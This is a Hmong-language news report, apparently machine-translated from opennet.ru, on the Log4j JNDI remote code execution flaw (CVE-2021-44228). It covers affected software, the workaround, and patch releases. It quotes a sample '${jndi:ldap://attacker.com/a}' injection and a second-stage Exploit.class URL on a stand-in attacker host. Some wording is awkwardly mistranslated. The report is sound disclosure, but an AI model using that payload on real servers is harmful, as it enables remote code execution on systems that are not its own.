Hauv Apache Log4j, lub hauv paus nrov rau kev teeb tsa kev nkag rau hauv Java daim ntawv thov, qhov muaj qhov tsis zoo tseem ceeb tau raug txheeb xyuas uas tso cai rau kev txiav txim siab txiav txim siab thaum tus nqi tshwj xeeb hauv formatted hauv "{jndi:URL}" hom ntawv sau rau lub cav. Qhov kev tawm tsam tuaj yeem nqa tawm ntawm Java daim ntawv thov uas teev cov txiaj ntsig tau txais los ntawm cov chaw sab nraud, piv txwv li, thaum pom cov txiaj ntsig teeb meem hauv cov lus yuam kev.
Nws tau sau tseg tias yuav luag txhua qhov haujlwm uas siv lub moj khaum xws li Apache Struts, Apache Solr, Apache Druid lossis Apache Flink cuam tshuam los ntawm qhov teeb meem, suav nrog Chav, Apple iCloud, Minecraft cov neeg siv khoom thiab cov servers. Nws cia siab tias qhov tsis zoo tuaj yeem ua rau muaj kev tawm tsam loj heev ntawm cov ntawv thov kev lag luam, rov hais dua cov keeb kwm ntawm qhov tsis zoo nyob hauv Apache Struts lub moj khaum, uas, raws li kev kwv yees ntxhib, yog siv hauv web daim ntawv thov los ntawm 65% ntawm Fortune. 100 tuam txhab uas muag, suav nrog kev sim tshuaj xyuas lub network rau cov tshuab tsis zoo.
Qhov teeb meem yog qhov hnyav dua los ntawm qhov tseeb tias qhov kev siv nyiaj ua haujlwm twb tau luam tawm lawm, tab sis kev kho rau cov ceg ruaj khov tseem tsis tau muab tso ua ke. Tus CVE tus cim tseem tsis tau raug muab. Qhov kho tsuas yog suav nrog hauv log4j-2.15.0-rc1 xeem ceg. Raws li kev ua haujlwm rau kev thaiv qhov tsis zoo, nws raug nquahu kom teeb lub log4j2.formatMsgNoLookups parameter kom muaj tseeb.
Qhov teeb meem yog tshwm sim los ntawm qhov tseeb tias log4j txhawb kev ua cov qhov ncauj qhov ntswg tshwj xeeb β{}β nyob rau hauv cov kab tawm mus rau lub cav, uas JNDI (Java Naming thiab Directory Interface) cov lus nug tuaj yeem raug tua. Qhov kev tawm tsam npau taws kom dhau txoj hlua nrog kev hloov pauv "${jndi: ldap://attacker.com/a}", thaum ua tiav uas log4j yuav xa ib daim ntawv thov LDAP rau txoj hauv kev mus rau Java chav rau attacker.com server . Txoj kev xa rov qab los ntawm tus neeg tua neeg tus neeg rau zaub mov (piv txwv li, http://second-stage.attacker.com/Exploit.class) yuav raug thauj khoom thiab ua tiav hauv cov ntsiab lus ntawm cov txheej txheem tam sim no, uas tso cai rau tus neeg tawm tsam kom ua tiav cov cai ntawm qhov system nrog cov cai ntawm daim ntawv thov tam sim no.
Ntxiv 1: Qhov tsis zoo no tau muab rau tus cim CVE-2021-44228.
Ntxiv 2: Ib txoj hauv kev los hla kev tiv thaiv ntxiv los ntawm kev tso tawm log4j-2.15.0-rc1 tau raug txheeb xyuas. Ib qho kev hloov tshiab tshiab, log4j-2.15.0-rc2, tau tshaj tawm nrog kev tiv thaiv ntau dua rau qhov tsis zoo. Cov cai hais txog qhov kev hloov pauv cuam tshuam nrog qhov tsis muaj qhov txawv txav thaum siv JNDI URL formatted tsis raug.
Tau qhov twg los: opennet.ru